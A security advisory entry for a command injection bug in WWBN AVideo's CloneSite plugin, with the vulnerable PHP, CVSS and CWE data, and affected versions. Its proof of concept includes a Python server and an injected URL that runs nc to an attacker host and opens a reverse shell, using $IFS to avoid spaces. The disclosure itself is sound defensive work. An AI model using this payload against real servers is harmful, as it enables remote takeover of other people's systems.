GHSA-2mhh-27v7-3vcx

Suggest an improvement
Source
https://github.com/advisories/GHSA-2mhh-27v7-3vcx
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/05/GHSA-2mhh-27v7-3vcx/GHSA-2mhh-27v7-3vcx.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-2mhh-27v7-3vcx
Aliases
Published
2023-05-12T20:20:39Z
Modified
2023-11-11T05:29:45.976207Z
Severity
  • 8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
WWBN AVideo command injection vulnerability
Details

WWBN AVideo Authenticated RCE

A command injection vulnerability exists at plugin/CloneSite/cloneClient.json.php which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for CVE-2023-30854 which affects WWBN Avideo up to version 12.3

Vulnerable Code

/plugin/CloneSite/cloneClient.json.php

$json->sqlFile = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->sqlFile));
$json->videoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->videoFiles));
$json->photoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->photoFiles));

// get dump file
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);

The $objClone->cloneSiteURL is not properly sanitized.

Exploit Proof-of-Concept

avidexploit.py

from http.server import BaseHTTPRequestHandler, HTTPServer
import time

hostName = "localhost"
serverPort = 8080

class MyServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-type", "application/json")
        self.end_headers()
        self.wfile.write(bytes("{\"error\":false,\"msg\":\"\",\"url\":\"https:\/\/attacker.com/\/\",\"key\":\"2d6db3c09e41a9c27dbc72aecc4a6fc0\",\"useRsync\":1,\"videosDir\":\"\/var\/www\/html\/demo.avideo.com\/videos\/\",\"sqlFile\":\"Clone_mysqlDump_644ab263e62d6.sql\",\"videoFiles\":[],\"photoFiles\":[]}", "utf-8"))

if __name__ == "__main__":        
    webServer = HTTPServer((hostName, serverPort), MyServer)
    print("Server started http://%s:%s" % (hostName, serverPort))

    try:
        webServer.serve_forever()
    except KeyboardInterrupt:
        pass

    webServer.server_close()
    print("Server stopped.")

Run in command line

$ python3 avidexploit.py &
$ ngrok tcp 8080 # optional if not running in VPS

- Then get your public facing IP and Port. Enter a cloneSiteURL like the following then hit clone to achieve command injection

http://2.tcp.ngrok.io:14599/;nc$IFS'ATTACKER.COM'$IFS'5555'$IFS-e$IFS/bin/sh;#

It is important to not use white spaces for the exploit to work. Replace whitespace with $IFS when adding arguments to your RCE

poc

Credits

Database specific
{
    "nvd_published_at": "2023-05-12T14:15:10Z",
    "cwe_ids": [
        "CWE-77"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2023-05-12T20:20:39Z"
}
References

Affected packages

Packagist / wwbn/avideo

Package

Name
wwbn/avideo
Purl
pkg:composer/wwbn/avideo

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
12.4

Affected versions

10.*

10.4
10.8

Other

11

11.*

11.1
11.1.1
11.5
11.6

12.*

12.4